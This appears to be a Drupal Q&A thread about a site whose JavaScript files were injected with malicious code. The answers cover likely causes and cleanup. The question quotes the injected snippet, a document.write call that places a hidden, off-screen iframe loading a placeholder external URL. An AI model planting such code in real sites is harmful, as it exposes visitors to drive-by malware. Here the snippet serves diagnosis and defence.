# Malicious code on my site

Tags: 7, javascript, security

I found that in all the JavaScript files on my Drupal website, there is JavaScript code with an `<iframe>` pointing to an external website. When I open the website through Google Chrome, the browser shows a warning about malware.

How is it possible that someone was able to write code in a  JavaScript file?

The file permissions for the settings.php file are 0444.

This is sample of the injected code.

```javascript
jQuery(document).ready(function($) {
  $("#edit-search-web").Watermark(" type the keyword");
});; document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="SOMEBADURL"></iframe>');
```

Answer (score 4, accepted):

Without knowing the specifics or your installation, nobody can give you the exact reason you got hacked.

I suspect that your server is running a vulnerable version of PHP and that Apache has write access to your site files.  Typically, there will be a bot that will GET a specifc URL that will download a script onto the server, which will then append to well-known (or all) Javascript files.  These additions will add in the malicious code.

After you fix this problem, you should.

- Patch your PHP to bring it up to the latest revision for your version of PHP.
- Update Drupal to the latest revision for your version.
- Clean out your /tmp folders on the server and reboot it.
- Read up on [Securing file permissions and ownership](http://drupal.org/node/244924).  It is important that you fix permissions each time you update files; a lot of FTP clients botch permissions when they upload.
- If you are on shared hosting, consider moving to a VPS or Drupal specific hosting.  Running Apache as your login account makes sense for the server owners, not the website owner.
- Create a git repo in your DOCROOT, add all of the files (the standard gitignore shoud be fine), and create a "remote" repo on the local filesystem that you can `git push` to.  This makes backuping up and restoring site files pretty easy.

Comment: I have asked my server provider to set my website to 503. While we are looking for the cause.  Thank you very much for your suggestions, i wrote them to my service provider waiting for a response! The other strange thing is i also find a php file named wtm7568n.php on the root of my server(It is outside the public_html).

Answer (score 2):

If the changed files are part of conributed modules, the [Hacked! module](http://drupal.org/project/hacked) could comme in handy.

> This module scans the currently installed Drupal, contributed modules and themes, re-downloads them and determines if they have been changed. Changes are marked clearly and if the [diff module](http://drupal.org/project/diff) is installed then Hacked! will allow you to see the exact lines that have changed.

Comment: It is not only the contributed modules js, its all the drupal including core javascript files.

Comment: @mrcniceguy diff module is good to track changed files.